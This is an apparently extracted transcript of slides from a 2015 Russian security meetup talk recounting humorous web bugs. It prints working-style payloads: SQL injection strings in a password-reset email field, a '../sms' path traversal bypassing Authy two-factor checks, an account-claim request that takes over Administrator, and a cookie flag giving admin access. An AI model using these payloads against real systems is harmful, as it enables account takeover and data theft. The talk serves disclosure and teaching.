Дмитрий bo0om Бумов, security meetup 9 апреля, mail.ru group
TRANSCRIPT
learnppt.com
LOGO
Ты такой смешной!!!1!))00)Весёлые (и не очень) баги и взломы
9 апреля 2015
#securitymeetup
ПРЕДУПРЕЖДЕНИЕ!
Последующие слайды содержат сценысексуального насилия над web-приложениямии програмным обеспечением различной тематики и направленности.Копирование и воспроизведение векторов атаккарается 272 статьей Уголовного кодексаРоссийской Федерации, хотя такие экземплярыещё и найти надо, так что можете попробовать,но если что, я вас предупреждал! Ну вы поняли...
3Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
Время интересных
ИСТОРИЙ#securitymeetup
4Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@isox_xx
#securitymeetup
5Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
GET /shutdown/ HTTP/1.1
Host: up-fotki.yandex.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fotki.yandex.ru/upload?force=js
Cервак выключается...
https://up-fotki.yandex.ru/shutdown/
@isox_xx
#securitymeetup
6Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@isox_xx
#securitymeetup
7Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@isox_xx
#securitymeetup
8Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@isox_xx
#securitymeetup
9Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@webpentest
POST /signup/claim/id*/ HTTP/1.1
...
CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&[email protected]&password=test&login=MyLogin
POST /signup/claim/WMkiheTT-8kRslImVLWMVw/ HTTP/1.1
...
CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&[email protected]&password=test&login=Administrator
Регистрация курильщика:
Регистрация здорового человека:
*Где id - уникальный идентификатор, который берётся... На странице существующего пользователя
#securitymeetup
10Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@webpentest
Уже существует пользователь? Не беда!
В итоге перекидывает в админку сервиса с "свежереганным" логином.
#securitymeetup
11Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@4rt3m
#securitymeetup
12Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@4rt3m
#securitymeetup
13Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup
14Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@fb1h2s @msecnet
#securitymeetup
15Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@homakov
#securitymeetup
16Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@homakov
1. Вводим ../sms в поле токена
2. Клиент кодирует это как ..%2fsms и делает запрос на api.authy.com/protected/json/verify/..%2fsms/authy_id
3. path_traversal декодирует полученный URL на раннем этапе в api.authy.com/protected/json/verify/../sms/authy_id, делит все по / и удаляет директорию /verify
4. Теперь само приложение получает модифицированный путь api.authy.com/protected/json/sms/authy_id который посылает СМС жертве и возвращает 200 статус и ответом {«success»:true,«message»:«SMS token was sent»,«cellphone»:"+1-XXX-XXX-XX85"}
5. Наш клиент который хотел проверить наш токен видит 200 статус и делает выводчто токен правильный. Даже если используется кастомная реализация API, клиентскорее всего ищет success=true что в нашем ответе тоже присутствует.
Попросту говоря введя ../sms в поле токена можно было обойти двух факторную аутенфикацию на всех сайтах использующих Authy.
#securitymeetup
17Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup
18Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup
19Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@fgkm_
Когда имя пользователя в url
#securitymeetup
20Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@Black2Fan
RCE В ФОРМИРОВАНИИ CSS ФАЙЛА!!!!!11!!!!!адин!!
#securitymeetup
21Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
Root, пароль дляслабаков!
#securitymeetup
22Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@d90andrew
Восстановление пароля.Поле для email'а:[email protected]' and 'a'='a# - письмо приходит[email protected]' and 'a'='b# - не отправляется
[email protected]' union select 1,2,3,4,5,6#
#securitymeetup
23Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@d90andrew
[email protected]' union select 1,2,3,concat_ws(0x3a,version(),database()),5,6#
#securitymeetup
24Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@d90andrew
Пара часов и база пользователей в кармане!Точнее в почте...
#securitymeetup
25Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup
26Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
ЧОЭТА?#securitymeetup
27Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO@asintsov
Привет, сервак, как жизнь? Как дети? Форкаешься еще?
Если ты ADMIN, то хэш твоего пароля XXXXXXX!Ты уверен, что у твоего пароля такой хэш?
Ну ты скажешь! Конечно! У меня такой же хэш и получился!Админ я или кто, по-твоему!
Ну раз Админ, то проходи!
Ну привет, клиентик. Ты сам-то чьих будешь?
Ну как же это? Админ я, Админ!
Соединение установлено. Текущий пользователь: ADMIN
Самая крутая СУБД в мире - OpenEdge
#securitymeetup
28Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
ЧТОЧТО ЗАЗАхерняхерня туттут
ПРОИСХОДИТ??ПРОИСХОДИТ??
#securitymeetup
29Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
Были подобраны файлы и папки:
• /image/• /css/• /js/• /index.php• /login.php• /logout.php
#securitymeetup
30Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
GET /logout.php HTTP/1.1
Host: *******.ru
HTTP/1.1 200 Ok
Server: nginx
Date: Dec, 29 Apr 1970 13:14:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Set-Cookie: 7ed93bc3576665339e899f356890fa5e=false; Path=/
Запрос:
Ответ:
#securitymeetup
31Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
GET /index.php HTTP/1.1
Host: *******.ru
Cookie: 7ed93bc3576665339e899f356890fa5e=true
Запрос:
Добро пожаловать в панель администратора!
ииииииииии...
#securitymeetup
32Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGOА бывает наоборот...
#securitymeetup
33Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup
Bo0oM@i_bo0om
Пишу лучше чем говорю(инфа сотка)
34Questions & feedback? Email me – [email protected] PowerPoint resources and downloads available at learnppt.com.learnppt.com
LOGO
#securitymeetup
СДАЛСДАЛ
ИГЭИГЭ??http://goo.gl/TxxCi3